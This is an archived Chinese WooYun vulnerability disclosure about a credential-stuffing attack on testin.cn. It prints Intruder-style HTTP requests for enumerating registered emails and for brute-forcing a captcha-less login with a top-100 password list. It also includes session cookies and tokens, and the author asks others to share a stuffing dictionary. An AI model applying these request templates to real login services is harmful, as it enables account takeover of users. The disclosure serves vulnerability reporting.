乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-29: 细节已通知厂商并且等待厂商处理中 2015-08-03: 厂商已经主动忽略漏洞,细节向公众公开
撞库攻击。
http://www.testin.cn/portal.action?op=Portal.index
我们先将注册过的邮箱撞一遍,这里用[email protected](有没有大牛在zone共享一个撞库字典,邮箱+密码)数据包如下
POST /json/portal.action?op=Portal.checkEmailExist&td=0.5637650243006647 HTTP/1.1Host: www.testin.cnContent-Length: 19Accept: application/json, text/javascript, */*; q=0.01Origin: http://www.testin.cnX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://www.testin.cn/portal.action?op=Portal.indexAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: IESESSION=alive; pgv_pvi=76659712; pgv_si=s5168476160; US=%7C%7C%7C%7C%7Cla%3Dzh%7C%7C%7C%7C%7C%7C%7C%7C; _ga=GA1.2.1615549527.1438076599; JSESSIONID=E97BEBAD19AFBBAAB4F51579C34627CB; __utmt=1; isnewlogin=1; MECHAT_CKID=cookieVal=006600143807660108132496; CNZZDATA1254750383=918811460-1438075496-http%253A%252F%252Fsso.testin.cn%252F%7C1438137048; __utma=248299522.1615549527.1438076599.1438089746.1438134929.3; __utmb=248299522.56.10.1438134929; __utmc=248299522; __utmz=248299522.1438076599.1.1.utmcsr=s.bt.gg|utmccn=(referral)|utmcmd=referral|utmcct=/; MECHAT_LVTime=1438137599008email=s§dongdoehei§%40163.com
跑完之后得到注册邮箱!
*****ng**********pe**********na**********yin**********ong**********ia**********ng**********yu**********in*****
有一点点少不知道能不能出来然后找了好几个接口测试,发现一处没有验证码。
http://pre.im/site/login
登陆,抓包!
POST /site/login HTTP/1.1Host: pre.imContent-Length: 152Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://pre.imUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://pre.im/site/loginAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: _csrf=65776aadb0dc2b36556b12fbc0ed23f4c1da3297c22a56ed02e755c11cf94742a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22KlTzKDNyjKAOma8lFp7QZb874J6Drh68%22%3B%7D; PHPSESSID=av03tc7obvsopgv6m2fn8iepr6; authtoken=EFA70100608cb664353a4e5fff783b8ed7bd829b; loginemail=service%40testin.cn; SERVERID=d81526ee18c549915fdae67f04b3b39d|1438137165|1438137165; CNZZDATA1255620131=505821548-1438071738-null%7C1438134055_csrf=dC44Y0xFTTE%2FQmwZBwEDSB5leSwhJHVdMl4PMhYndQZAZA4nPi17CQ%3D%3D&User%5Bemail%5D=§doxuehei§%40163.com&User%5Bpassword%5D=§YXTES23§&login-button=
user载入刚才用户民,密码用top100
302为成功登陆的
***** aaa********** aaa*****
有木有大牛在zone贡献个撞库字典啊
危害等级:无影响厂商忽略
忽略时间:2015-08-03 11:58
漏洞Rank:4 (WooYun评价)
暂无